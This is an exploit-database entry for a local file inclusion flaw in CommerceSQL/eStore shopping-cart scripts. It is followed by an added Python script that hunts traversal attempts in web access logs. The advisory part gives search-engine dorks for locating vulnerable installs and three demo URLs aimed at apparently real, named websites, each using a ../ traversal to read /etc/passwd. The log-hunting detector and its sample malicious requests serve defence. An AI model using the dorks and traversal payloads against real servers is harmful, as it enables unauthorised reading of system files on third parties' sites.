CommerceSQL LFI Vulnerability



EKU-ID: 176 CVE: OSVDB-ID:
Author: expku Published: 2011-05-09 Verified: Verified

# Exploit Title: CommerceSQL LFI Vulnerability
# Author: xConsoLe`
# Home: http://dztools.net
# Vendor or Software Link: http://www.commercesql.com/
# Category: Local File Include
# d0rk: intext:Couldn't exec sth! at ./admin/html_lib.pl line
# d0rk: inurl:cgi-bin/commercesql
# Tested on: Windows XP SP3

xConsoLe Powa

> Demo:

eg: http://birdstheword.com/cgi-bin/eStore/index.cgi?cart_id=2263.81894&pid=396
>> http://birdstheword.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd

eg: http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=95
>> http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=../../../../../../../etc/passwd

eg: http://brewercoinc.com/cgi-bin/eStore/index.cgi?did=2&plid=&pid=27&product=
>> http://brewercoinc.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd

Greetz: My Girl <3 ; Uknownv1rus ; Dfpirate ; J|nX ; Massyusse ; Death.Sev ; XeN` ; FiiskeR ; Manson .
Made in Algeria .
Shab El Bac 2011 nchallah : Ma , Am , Li , Sa , Sa , Ha , Mehdi K , Rafa , Bou3am , MahM0ud , Death.Sev & All Djma3et Elkhire :D .
PEACE ^^ .
#
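
For operators of a CommerceSQL or eStore install, the pattern in the demo (a `page` value made of `../` sequences sent to `index.cgi`) can be hunted in web server access logs. The following is an added example, not part of the original advisory or the vendor's code: it assumes Common Log Format, and the log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Common Log Format); client IPs are documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [09/May/2011:10:00:01 +0000] "GET /cgi-bin/CommerceSQL/index.cgi?page=95 HTTP/1.1" 200 5120
192.0.2.44 - - [09/May/2011:10:00:07 +0000] "GET /cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd HTTP/1.1" 200 1432
192.0.2.44 - - [09/May/2011:10:00:09 +0000] "GET /cgi-bin/eStore/index.cgi?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1432
192.0.2.44 - - [09/May/2011:10:00:12 +0000] "GET /cgi-bin/eStore/index.cgi?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 310
192.0.2.10 - - [09/May/2011:10:01:00 +0000] "GET /cgi-bin/eStore/index.cgi?cart_id=2263.81894&pid=396 HTTP/1.1" 200 8230
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # a ".." path segment, / or \ separated

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_page(value):
    """True if a `page` value climbs directories, is absolute, or carries a NUL byte."""
    v = fully_decode(value)
    return bool(TRAVERSAL_RE.search(v)) or v.startswith(("/", "\\")) or "\x00" in v

def find_lfi_attempts(log_text):
    """Return (client, status, decoded page value) for each suspicious index.cgi request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/index.cgi"):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == "page" and suspicious_page(value):
                hits.append((client, int(status), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the server returned content for the traversal request and should be triaged first; the same `suspicious_page` check can be applied server-side to reject such values before the script opens any file.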